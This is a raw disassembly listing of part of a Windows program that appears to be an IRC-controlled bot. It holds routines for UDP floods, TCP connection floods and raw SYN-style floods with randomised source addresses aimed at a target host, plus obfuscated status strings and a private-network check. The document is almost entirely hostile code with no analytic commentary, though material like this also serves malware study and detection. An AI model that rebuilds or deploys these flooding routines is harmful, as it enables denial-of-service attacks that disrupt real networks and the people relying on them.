movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
push offset aCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429B03
add esp, 38h
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_41D917 endp
; =============== S U B R O U T I N E =======================================
sub_41DA15 proc near ; CODE XREF: sub_41D5EF+27�p
; sub_41D7D2+139�p
var_C = dword ptr -0Ch
var_8 = byte ptr -8
sub esp, 0Ch
push ebx
push ebp
push esi
push edi
push 10h
mov esi, offset dword_4583F8
push 0
push esi
mov ebx, ecx
call sub_429760
add esp, 0Ch
call dword_437188 ; GetTickCount
push eax
call sub_41BAFF
mov ebp, offset dword_447730
mov [esp+20h+var_C], eax
push ebp
push esi
call sub_429B03
add esp, 0Ch
push 0
push offset aMirc ; "mIRC"
call dword_456F44 ; FindWindowA
mov edi, dword_437090
test eax, eax
jz short loc_41DA75
push offset aM ; "M"
push esi
mov dword ptr [ebx+2Ch], 1
call edi ; dword_437090
loc_41DA75: ; CODE XREF: sub_41DA15+4F�j
push offset dword_457CF8
call sub_41E4C1
test eax, eax
pop ecx
jz short loc_41DA93
push offset aP ; "P"
push esi
mov dword ptr [ebx+30h], 1
call edi ; dword_437090
loc_41DA93: ; CODE XREF: sub_41DA15+6D�j
push [esp+1Ch+var_C]
lea eax, [esp+20h+var_8]
push offset a_2d ; "%.2d"
push eax
call sub_429B03
mov eax, [esp+28h+var_C]
add esp, 0Ch
mov [ebx+28h], eax
lea eax, [esp+1Ch+var_8]
push eax
push esi
call edi ; dword_437090
push ebp
push esi
call edi ; dword_437090
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_41DA15 endp
; =============== S U B R O U T I N E =======================================
sub_41DAC6 proc near ; CODE XREF: sub_41D7D2+31�p
push ebx
push ebp
push esi
push edi
push 10h
mov esi, offset dword_458408
push 0
push esi
mov edi, ecx
call sub_429760
add esp, 0Ch
call dword_437188 ; GetTickCount
push eax
call sub_41BAFF
pop ecx
push 0
push offset aMirc ; "mIRC"
call dword_456F44 ; FindWindowA
mov ebx, dword_437090
xor ebp, ebp
inc ebp
test eax, eax
jz short loc_41DB10
push offset aM_0 ; "M|"
push esi
mov [edi+2Ch], ebp
call ebx ; dword_437090
loc_41DB10: ; CODE XREF: sub_41DAC6+3D�j
push offset dword_457CF8
call sub_41E4C1
test eax, eax
pop ecx
jz short loc_41DB2A
push offset aP_0 ; "P|"
push esi
mov [edi+30h], ebp
call ebx ; dword_437090
loc_41DB2A: ; CODE XREF: sub_41DAC6+57�j
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41DAC6 endp
; =============== S U B R O U T I N E =======================================
sub_41DB31 proc near ; CODE XREF: sub_420D74+12�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41DB3C
xor eax, eax
inc eax
jmp short locret_41DB55
; ---------------------------------------------------------------------------
loc_41DB3C: ; CODE XREF: sub_41DB31+4�j
push [esp+arg_0]
push offset aTugnf_mqsdr0_0 ; "TuGNF.mQSDR0"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 14h
locret_41DB55: ; CODE XREF: sub_41DB31+9�j
retn 4
sub_41DB31 endp
; =============== S U B R O U T I N E =======================================
sub_41DB58 proc near ; CODE XREF: sub_40A9FE+794�p
; sub_40A9FE+231A�p ...
mov eax, [ecx+8]
retn
sub_41DB58 endp
; =============== S U B R O U T I N E =======================================
sub_41DB5C proc near ; CODE XREF: sub_40A9FE+7B1�p
; sub_40A9FE+8768�p ...
mov eax, [ecx+0Ch]
retn
sub_41DB5C endp
; =============== S U B R O U T I N E =======================================
sub_41DB60 proc near ; CODE XREF: sub_418FA1+5BD�p
; sub_422009+DF�p ...
mov al, [ecx+4]
retn
sub_41DB60 endp
; =============== S U B R O U T I N E =======================================
sub_41DB64 proc near ; CODE XREF: sub_418FA1+64B�p
mov al, [ecx+5]
retn
sub_41DB64 endp
; =============== S U B R O U T I N E =======================================
sub_41DB68 proc near ; CODE XREF: sub_40A9FE+6195�p
; sub_40A9FE+9991�p
mov eax, [ecx]
retn
sub_41DB68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB6B proc near ; DATA XREF: sub_40A9FE+6FF6�o
var_150 = dword ptr -150h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 150h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov dword ptr [eax+12Ch], 1
mov eax, [ebp+var_150]
xor esi, esi
mov [ebp+var_8], eax
push esi
mov [ebp+arg_0], esi
call sub_42A7D5
push 32h
mov [ebp+var_10], eax
call sub_4297B8
pop ecx
cmp eax, esi
pop ecx
mov [ebp+var_4], eax
jz loc_41DC8D
push 10h
lea eax, [ebp+var_20]
push esi
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_C8]
push eax
call dword_4372C0 ; inet_addr
push [ebp+var_3C]
mov [ebp+var_1C], eax
mov [ebp+var_20], 2
call dword_4372C4 ; ntohs
mov ebx, dword_4372D8
mov [ebp+var_1E], ax
loc_41DBF4: ; CODE XREF: sub_41DB6B+111�j
xor edi, edi
cmp [ebp+var_3C], edi
jnz short loc_41DC04
call sub_429B9C
mov [ebp+var_1E], ax
loc_41DC04: ; CODE XREF: sub_41DB6B+8E�j
push 11h
push 2
push 2
call dword_4372BC ; socket
mov esi, eax
cmp esi, edi
jl short loc_41DC81
lea eax, [ebp+var_C]
mov [ebp+var_C], 1
push eax
push 8004667Eh
push esi
call dword_437290 ; ioctlsocket
loc_41DC2D: ; CODE XREF: sub_41DB6B+D1�j
call sub_429B9C
mov ecx, [ebp+var_4]
mov [edi+ecx], al
inc edi
cmp edi, 32h
jb short loc_41DC2D
lea eax, [ebp+var_20]
push 10h
xor edi, edi
push eax
push edi
push 32h
push ecx
push esi
call dword_437294 ; sendto
push esi
call ebx ; dword_4372D8
cmp [ebp+arg_0], 32h
jb short loc_41DC70
push edi
call sub_42A7D5
mov edx, [ebp+var_10]
pop ecx
mov ecx, [ebp+var_38]
add ecx, edx
cmp eax, ecx
jge short loc_41DC96
mov [ebp+arg_0], edi
loc_41DC70: ; CODE XREF: sub_41DB6B+ED�j
push [ebp+var_40]
inc [ebp+arg_0]
call dword_437190 ; Sleep
jmp loc_41DBF4
; ---------------------------------------------------------------------------
loc_41DC81: ; CODE XREF: sub_41DB6B+A9�j
push esi
call ebx ; dword_4372D8
push [ebp+var_34]
call sub_423623
pop ecx
loc_41DC8D: ; CODE XREF: sub_41DB6B+4B�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41DC96: ; CODE XREF: sub_41DB6B+100�j
cmp [ebp+var_2C], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41DCCD
cmp [ebp+var_30], 0
jnz short loc_41DCD3
lea eax, [ebp+var_C8]
push eax
push ebx
push edi
lea eax, [ebp+var_148]
push esi
push eax
push [ebp+var_8]
call sub_41CE4A
add esp, 18h
loc_41DCCD: ; CODE XREF: sub_41DB6B+13E�j
cmp [ebp+var_30], 0
jz short loc_41DCEF
loc_41DCD3: ; CODE XREF: sub_41DB6B+144�j
lea eax, [ebp+var_C8]
push eax
push ebx
push edi
lea eax, [ebp+var_148]
push esi
push eax
push [ebp+var_8]
call sub_41CDD4
add esp, 18h
loc_41DCEF: ; CODE XREF: sub_41DB6B+166�j
push [ebp+var_4]
call sub_4298F2
push [ebp+var_34]
call sub_423623
pop ecx
pop ecx
push 0
call dword_437174 ; ExitThread
sub_41DB6B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD09 proc near ; DATA XREF: sub_40A9FE+71DF�o
var_14C = dword ptr -14Ch
var_144 = byte ptr -144h
var_C4 = byte ptr -0C4h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
mov dword ptr [eax+12Ch], 1
mov eax, [ebp+var_14C]
xor ebx, ebx
mov [ebp+var_4], eax
push ebx
mov [ebp+arg_0], ebx
call sub_42A7D5
mov [ebp+var_8], eax
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_429760
add esp, 10h
lea eax, [ebp+var_C4]
push eax
call dword_4372C0 ; inet_addr
push [ebp+var_38]
mov [ebp+var_18], eax
mov [ebp+var_1C], 2
call dword_4372C4 ; ntohs
mov edi, dword_4372D8
mov [ebp+var_1A], ax
loc_41DD7E: ; CODE XREF: sub_41DD09+E4�j
cmp [ebp+var_38], ebx
jnz short loc_41DD8C
call sub_429B9C
mov [ebp+var_1A], ax
loc_41DD8C: ; CODE XREF: sub_41DD09+78�j
push 6
push 1
push 2
call dword_4372BC ; socket
mov esi, eax
cmp esi, ebx
jl short loc_41DDEF
lea eax, [ebp+var_C]
mov [ebp+var_C], 4
push eax
push 8004667Eh
push esi
call dword_437290 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4372CC ; connect
push esi
call edi ; dword_4372D8
cmp [ebp+arg_0], 32h
jl short loc_41DDE1
push ebx
call sub_42A7D5
mov edx, [ebp+var_8]
pop ecx
mov ecx, [ebp+var_34]
add ecx, edx
cmp eax, ecx
jge short loc_41DE04
mov [ebp+arg_0], ebx
loc_41DDE1: ; CODE XREF: sub_41DD09+C0�j
push [ebp+var_3C]
inc [ebp+arg_0]
call dword_437190 ; Sleep
jmp short loc_41DD7E
; ---------------------------------------------------------------------------
loc_41DDEF: ; CODE XREF: sub_41DD09+93�j
push esi
call edi ; dword_4372D8
push [ebp+var_30]
call sub_423623
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41DE04: ; CODE XREF: sub_41DD09+D3�j
cmp [ebp+var_28], 0
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41DE3B
cmp [ebp+var_2C], 0
jnz short loc_41DE41
lea eax, [ebp+var_C4]
push eax
push ebx
push edi
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+var_4]
call sub_41CE4A
add esp, 18h
loc_41DE3B: ; CODE XREF: sub_41DD09+10E�j
cmp [ebp+var_2C], 0
jz short loc_41DE5D
loc_41DE41: ; CODE XREF: sub_41DD09+114�j
lea eax, [ebp+var_C4]
push eax
push ebx
push edi
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+var_4]
call sub_41CDD4
add esp, 18h
loc_41DE5D: ; CODE XREF: sub_41DD09+136�j
push [ebp+var_30]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
sub_41DD09 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DE6E proc near ; DATA XREF: sub_40A9FE+738A�o
var_248 = dword ptr -248h
var_240 = byte ptr -240h
var_1C0 = byte ptr -1C0h
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = byte ptr -110h
var_10F = byte ptr -10Fh
var_10E = word ptr -10Eh
var_10C = byte ptr -10Ch
var_E0 = byte ptr -0E0h
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = dword ptr -0C8h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = byte ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = word ptr -5Eh
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = word ptr -48h
var_46 = word ptr -46h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 248h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_248]
rep movsd
xor ecx, ecx
push 2
inc ecx
pop edx
mov [eax+12Ch], ecx
mov eax, [ebp+var_248]
push 4
mov [ebp+var_4], eax
pop eax
xor ebx, ebx
push 3
mov [ebp+var_BC], edx
pop esi
mov [ebp+var_B8], eax
push ebx
mov [ebp+var_B4], 5
mov [ebp+var_B0], 0B4h
mov [ebp+var_AC], eax
mov [ebp+var_A8], edx
mov [ebp+var_A4], 8
mov [ebp+var_A0], 0Ah
mov [ebp+var_9C], ebx
mov [ebp+var_98], ebx
mov [ebp+var_94], ebx
mov [ebp+var_90], ebx
mov [ebp+var_8C], ebx
mov [ebp+var_88], ebx
mov [ebp+var_84], ebx
mov [ebp+var_80], ebx
mov [ebp+var_7C], ecx
mov [ebp+var_78], esi
mov [ebp+var_74], esi
mov [ebp+var_70], ebx
mov [ebp+arg_0], ebx
call sub_42A7D5
mov [ebp+var_14], eax
pop ecx
lea eax, [ebp+var_1C0]
push eax
call dword_4372A4 ; gethostbyname
mov eax, [eax+0Ch]
push 0FFh
push esi
push 2
mov eax, [eax]
mov edi, [eax]
call dword_4372BC ; socket
cmp eax, ebx
mov [ebp+var_C], eax
jge short loc_41DFD5
cmp [ebp+var_124], ebx
mov edi, dword_437170
mov esi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
jnz short loc_41DF91
cmp [ebp+var_128], ebx
jnz short loc_41DF99
call edi ; dword_437170
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push esi
lea eax, [ebp+var_240]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+var_4]
call sub_41CE4A
add esp, 18h
loc_41DF91: ; CODE XREF: sub_41DE6E+F9�j
cmp [ebp+var_128], ebx
jz short loc_41DFB9
loc_41DF99: ; CODE XREF: sub_41DE6E+101�j
call edi ; dword_437170
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push esi
lea eax, [ebp+var_240]
push offset aSSD ; "%s %s <%d>"
push eax
push [ebp+var_4]
call sub_41CDD4
add esp, 18h
loc_41DFB9: ; CODE XREF: sub_41DE6E+129�j
push [ebp+var_C]
call dword_4372D8 ; closesocket
push [ebp+var_12C]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
loc_41DFD5: ; CODE XREF: sub_41DE6E+E6�j
xor eax, eax
loc_41DFD7: ; CODE XREF: sub_41DE6E+178�j
mov cl, byte ptr [ebp+eax*4+var_BC]
mov [ebp+eax+var_28], cl
inc eax
cmp eax, 14h
jl short loc_41DFD7
mov eax, [ebp+var_6C]
push [ebp+var_134]
mov esi, dword_4372C4
and al, 45h
or al, 45h
mov [ebp+var_68], 10h
mov [ebp+var_6C], eax
mov [ebp+var_62], 40h
mov [ebp+var_60], 40h
mov [ebp+var_5F], 6
mov [ebp+var_4C], ebx
mov [ebp+var_46], 0Ah
mov [ebp+var_48], bx
mov [ebp+var_32], bx
mov [ebp+var_34], bx
mov [ebp+var_38], bx
mov [ebp+var_3A], bx
mov [ebp+var_3C], bx
mov [ebp+var_3E], bx
mov [ebp+var_42], bx
mov [ebp+var_40], 1
mov [ebp+var_2E], 787Dh
mov [ebp+var_2A], bx
call esi ; dword_4372C4
movzx eax, ax
mov [ebp+var_8], eax
loc_41E051: ; CODE XREF: sub_41DE6E+351�j
call sub_429B9C
cdq
mov ecx, 0FFh
and edi, 0FFFFFFh
idiv ecx
shl edx, 18h
or edi, edx
cmp [ebp+var_134], ebx
jnz short loc_41E079
call sub_429B9C
mov [ebp+var_8], eax
loc_41E079: ; CODE XREF: sub_41DE6E+201�j
push 3Ch
call esi ; dword_4372C4
mov [ebp+var_66], ax
call sub_429B9C
mov [ebp+var_64], ax
lea eax, [ebp+var_1C0]
push eax
mov [ebp+var_5C], edi
call sub_41E3EC
mov [ebp+var_58], eax
mov [ebp+var_5E], bx
call sub_429B9C
mov [ebp+var_54], ax
mov ax, word ptr [ebp+var_8]
mov [ebp+var_52], ax
call sub_429B9C
mov [ebp+var_50], eax
mov ax, word ptr [ebp+var_8]
mov [ebp+var_CA], ax
lea eax, [ebp+var_1C0]
push eax
mov [ebp+var_2C], bx
mov [ebp+var_CC], 2
call sub_41E3EC
mov [ebp+var_C8], eax
lea eax, [ebp+var_6C]
push 14h
push eax
call sub_41E3E8
mov [ebp+var_5E], ax
call sub_429B9C
mov [ebp+var_10], eax
mov [ebp+var_1F], al
mov al, byte ptr [ebp+var_10+2]
mov [ebp+var_1E], ah
mov [ebp+var_1D], al
mov al, byte ptr [ebp+var_10+3]
mov [ebp+var_1C], al
lea eax, [ebp+var_1C0]
push eax
mov [ebp+var_118], edi
call sub_41E3EC
add esp, 14h
mov [ebp+var_114], eax
mov [ebp+var_110], bl
mov [ebp+var_10F], 6
push 28h
call esi ; dword_4372C4
mov [ebp+var_10E], ax
lea eax, [ebp+var_10C]
push 14h
push eax
lea eax, [ebp+var_54]
push eax
call sub_429420
lea eax, [ebp+var_E0]
push 14h
push eax
lea eax, [ebp+var_28]
push eax
call sub_429420
lea eax, [ebp+var_118]
push 34h
push eax
call sub_41E3E8
add esp, 20h
mov [ebp+var_2C], ax
lea eax, [ebp+var_CC]
push 10h
push eax
push ebx
lea eax, [ebp+var_6C]
push 3Ch
push eax
push [ebp+var_C]
call dword_437294 ; sendto
cmp [ebp+arg_0], 32h
jb short loc_41E1B0
push ebx
call sub_42A7D5
mov edx, [ebp+var_14]
pop ecx
mov ecx, [ebp+var_130]
add ecx, edx
cmp eax, ecx
jge short loc_41E1C4
mov [ebp+arg_0], ebx
loc_41E1B0: ; CODE XREF: sub_41DE6E+327�j
push [ebp+var_138]
inc [ebp+arg_0]
call dword_437190 ; Sleep
jmp loc_41E051
; ---------------------------------------------------------------------------
loc_41E1C4: ; CODE XREF: sub_41DE6E+33D�j
push [ebp+var_C]
call dword_4372D8 ; closesocket
cmp [ebp+var_124], ebx
mov esi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov edi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41E207
cmp [ebp+var_128], ebx
jnz short loc_41E20F
lea eax, [ebp+var_1C0]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push esi
lea eax, [ebp+var_240]
push edi
push eax
push [ebp+var_4]
call sub_41CE4A
add esp, 18h
loc_41E207: ; CODE XREF: sub_41DE6E+36F�j
cmp [ebp+var_128], ebx
jz short loc_41E22F
loc_41E20F: ; CODE XREF: sub_41DE6E+377�j
lea eax, [ebp+var_1C0]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push esi
lea eax, [ebp+var_240]
push edi
push eax
push [ebp+var_4]
call sub_41CDD4
add esp, 18h
loc_41E22F: ; CODE XREF: sub_41DE6E+39F�j
push [ebp+var_12C]
call sub_423623
pop ecx
push ebx
call dword_437174 ; ExitThread
sub_41DE6E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E242 proc near ; DATA XREF: sub_40A9FE+74FD�o
var_15C = dword ptr -15Ch
var_154 = byte ptr -154h
var_D4 = byte ptr -0D4h
var_4C = dword ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 15Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ch
mov esi, eax
pop ecx
lea edi, [ebp+var_15C]
rep movsd
xor edi, edi
mov ebx, 2400h
inc edi
xor esi, esi
mov [eax+12Ch], edi
mov eax, [ebp+var_15C]
push ebx
mov [ebp+var_10], eax
mov [ebp+var_8], edi
mov [ebp+arg_0], esi
call sub_4297B8
push esi
mov [ebp+var_14], eax
call sub_42A7D5
mov [ebp+var_18], eax
mov eax, [ebp+var_44]
mov [ebp+var_1C], eax
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_429760
lea eax, [ebp+var_D4]
push eax
call sub_41E3EC
mov esi, dword_437188
add esp, 18h
mov [ebp+var_28], eax
mov [ebp+var_2C], 2
call esi ; dword_437188
mov [ebp+var_C], eax
jmp short loc_41E345
; ---------------------------------------------------------------------------
loc_41E2C6: ; CODE XREF: sub_41E242+114�j
call sub_429B9C
push 11h
push 2
push 2
mov [ebp+var_2A], ax
call dword_4372BC ; socket
test eax, eax
mov [ebp+var_4], eax
jl loc_41E3CF
lea ecx, [ebp+var_8]
push 4
push ecx
push 8004667Eh
push 11h
push eax
mov [ebp+var_8], edi
call dword_43728C ; setsockopt
lea eax, [ebp+var_2C]
push 10h
push eax
push 0
push ebx
push [ebp+var_14]
push [ebp+var_4]
call dword_437294 ; sendto
push [ebp+var_4]
call sub_42F1A0
cmp [ebp+arg_0], 32h
pop ecx
jl short loc_41E339
push 0
call sub_42A7D5
mov edx, [ebp+var_18]
pop ecx
mov ecx, [ebp+var_1C]
add ecx, edx
cmp eax, ecx
jnb short loc_41E35C
and [ebp+arg_0], 0
loc_41E339: ; CODE XREF: sub_41E242+DD�j
push [ebp+var_4C]
inc [ebp+arg_0]
call dword_437190 ; Sleep
loc_41E345: ; CODE XREF: sub_41E242+82�j
call esi ; dword_437188
sub eax, [ebp+var_C]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_44]
jbe loc_41E2C6
loc_41E35C: ; CODE XREF: sub_41E242+F1�j
push [ebp+var_4]
call sub_42F1A0
cmp [ebp+var_38], 0
pop ecx
mov ebx, offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
mov edi, offset aYhzck13caog0 ; "YhzCK13CaOG0"
mov esi, offset aSSS_2 ; "%s %s -> %s"
jnz short loc_41E39C
cmp [ebp+var_3C], 0
jnz short loc_41E3A2
lea eax, [ebp+var_D4]
push eax
push ebx
push edi
lea eax, [ebp+var_154]
push esi
push eax
push [ebp+var_10]
call sub_41CE4A
add esp, 18h
loc_41E39C: ; CODE XREF: sub_41E242+136�j
cmp [ebp+var_3C], 0
jz short loc_41E3BE
loc_41E3A2: ; CODE XREF: sub_41E242+13C�j
lea eax, [ebp+var_D4]
push eax
push ebx
push edi
lea eax, [ebp+var_154]
push esi
push eax
push [ebp+var_10]
call sub_41CDD4
add esp, 18h
loc_41E3BE: ; CODE XREF: sub_41E242+15E�j
push [ebp+var_40]
call sub_423623
pop ecx
push 0
call dword_437174 ; ExitThread
loc_41E3CF: ; CODE XREF: sub_41E242+9E�j
push eax
call dword_4372D8 ; closesocket
push [ebp+var_40]
call sub_423623
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_41E242 endp
; =============== S U B R O U T I N E =======================================
sub_41E3E8 proc near ; CODE XREF: sub_41DE6E+27B�p
; sub_41DE6E+2FE�p ...
xor ax, ax
retn
sub_41E3E8 endp
; =============== S U B R O U T I N E =======================================
sub_41E3EC proc near ; CODE XREF: .text:00403DAD�p
; sub_404525+89�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_456F7C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_41E414
push [esp+arg_0]
call dword_456FD4 ; gethostbyname
test eax, eax
jnz short loc_41E40D
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41E40D: ; CODE XREF: sub_41E3EC+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_41E414: ; CODE XREF: sub_41E3EC+D�j
retn
sub_41E3EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E415 proc near ; CODE XREF: sub_4020BA+55�p
; .text:00403E40�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call sub_429B9C
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
inc eax
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul dbl_437340
call sub_42A9E0
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_41E415 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E446 proc near ; DATA XREF: sub_420D91+4C�o
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_42777F
mov esi, offset a@_6 ; "@"
push esi
push [ebp+var_4]
call sub_429C5E
push esi
push 0
call sub_429C5E
push eax
call sub_41E3EC
add esp, 20h
mov [ebp+arg_0], eax
push eax
call dword_456FDC ; inet_ntoa
push eax
push offset dword_457C40
call dword_4370B4 ; lstrcpyA
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call dword_456ED8 ; gethostbyaddr
pop esi
test eax, eax
push 9Fh
jz short loc_41E4AB
push dword ptr [eax]
jmp short loc_41E4B0
; ---------------------------------------------------------------------------
loc_41E4AB: ; CODE XREF: sub_41E446+5F�j
push offset aCouldnTResolve ; "Couldn't resolve"
loc_41E4B0: ; CODE XREF: sub_41E446+63�j
push offset dword_457C58
call sub_429D10
add esp, 0Ch
xor eax, eax
leave
retn
sub_41E446 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E4C1 proc near ; CODE XREF: sub_401B6E+15A�p
; sub_406429+F1�p ...
var_30 = byte ptr -30h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jz loc_41E590
mov esi, dword_437178
push offset byte_454A54
push [ebp+arg_0]
call esi ; dword_437178
test eax, eax
jz loc_41E590
push 20h
lea eax, [ebp+var_30]
push [ebp+arg_0]
push eax
call sub_429D10
mov edi, offset dword_43AB8C
lea eax, [ebp+var_30]
push edi
push eax
call sub_429C5E
add esp, 14h
mov [ebp+var_10], eax
test eax, eax
jz short loc_41E590
xor ebx, ebx
inc ebx
loc_41E516: ; CODE XREF: sub_41E4C1+6B�j
push edi
push 0
call sub_429C5E
pop ecx
mov [ebp+ebx*4+var_10], eax
test eax, eax
pop ecx
jz short loc_41E590
inc ebx
cmp ebx, 4
jl short loc_41E516
mov edi, [ebp+var_10]
push offset a10 ; "10"
push edi
call esi ; dword_437178
test eax, eax
jz short loc_41E58B
push offset a172 ; "172"
push edi
call esi ; dword_437178
test eax, eax
jnz short loc_41E557
push offset a16 ; "16"
push [ebp+var_C]
call esi ; dword_437178
test eax, eax
jz short loc_41E58B
loc_41E557: ; CODE XREF: sub_41E4C1+86�j
push offset a192 ; "192"
push edi
call esi ; dword_437178
test eax, eax
jnz short loc_41E571
push offset a168 ; "168"
push [ebp+var_C]
call esi ; dword_437178
test eax, eax
jz short loc_41E58B
